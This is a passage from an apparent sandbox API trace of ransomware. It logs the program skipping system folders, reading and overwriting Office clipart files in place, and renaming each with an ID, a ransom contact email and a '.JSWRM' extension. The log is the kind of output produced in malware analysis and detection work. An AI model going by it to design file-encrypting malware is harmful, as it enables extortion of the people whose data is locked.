hHeap=0x1e0000) returned 1 [0096.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0096.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00454_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.305] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2924) returned 1 [0096.305] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb60) returned 0x23fc98 [0096.305] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb60, lpOverlapped=0x0) returned 1 [0096.306] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.306] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb60, lpOverlapped=0x0) returned 1 [0096.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0096.307] CloseHandle (hObject=0x314) returned 1 [0096.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0096.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0096.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0096.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0096.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0096.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0096.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.307] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00454_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00454_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0096.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0096.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0096.308] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00466_.WMF", cAlternateFileName="")) returned 1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2=".") returned 1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2="..") returned 1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2="...") returned 1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2="windows") returned -1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2="recovery") returned 1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2="perflogs") returned 1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2="documents and settings") returned 1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2="system volume information") returned -1 [0096.308] lstrcmpiW (lpString1="SO00466_.WMF", lpString2="msocache") returned 1 [0096.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0096.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00466_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00466_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00466_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0096.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0096.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00466_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00466_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00466_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0096.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0096.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0096.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00466_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.309] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2760) returned 1 [0096.309] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xac0) returned 0x23fc98 [0096.310] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xac0, lpOverlapped=0x0) returned 1 [0096.311] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.311] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xac0, lpOverlapped=0x0) returned 1 [0096.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0096.311] CloseHandle (hObject=0x314) returned 1 [0096.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0096.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0096.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0096.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0096.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0096.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0096.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.312] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00466_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00466_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0096.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0096.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0096.313] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00476_.WMF", cAlternateFileName="")) returned 1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2=".") returned 1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2="..") returned 1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2="...") returned 1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2="windows") returned -1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2="recovery") returned 1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2="perflogs") returned 1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2="documents and settings") returned 1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2="system volume information") returned -1 [0096.313] lstrcmpiW (lpString1="SO00476_.WMF", lpString2="msocache") returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00476_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00476_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00476_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00476_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00476_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00476_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0096.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0096.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0096.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00476_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.314] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4032) returned 1 [0096.314] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfc0) returned 0x23fc98 [0096.314] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xfc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xfc0, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.339] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xfc0, lpOverlapped=0x0) returned 1 [0096.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0096.340] CloseHandle (hObject=0x314) returned 1 [0096.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0096.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0096.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0096.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0096.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0096.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0096.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.340] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00476_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00476_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0096.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0096.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0096.341] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00479_.WMF", cAlternateFileName="")) returned 1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2=".") returned 1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2="..") returned 1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2="...") returned 1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2="windows") returned -1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2="recovery") returned 1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2="perflogs") returned 1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2="documents and settings") returned 1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2="system volume information") returned -1 [0096.341] lstrcmpiW (lpString1="SO00479_.WMF", lpString2="msocache") returned 1 [0096.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00479_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00479_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00479_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0096.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00479_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00479_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00479_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0096.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0096.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0096.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0096.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00479_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.343] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23304) returned 1 [0096.343] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b00) returned 0x24d210 [0096.343] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5b00, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.346] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5b00, lpOverlapped=0x0) returned 1 [0096.346] HeapFree (in: hHeap=0x1e0000, 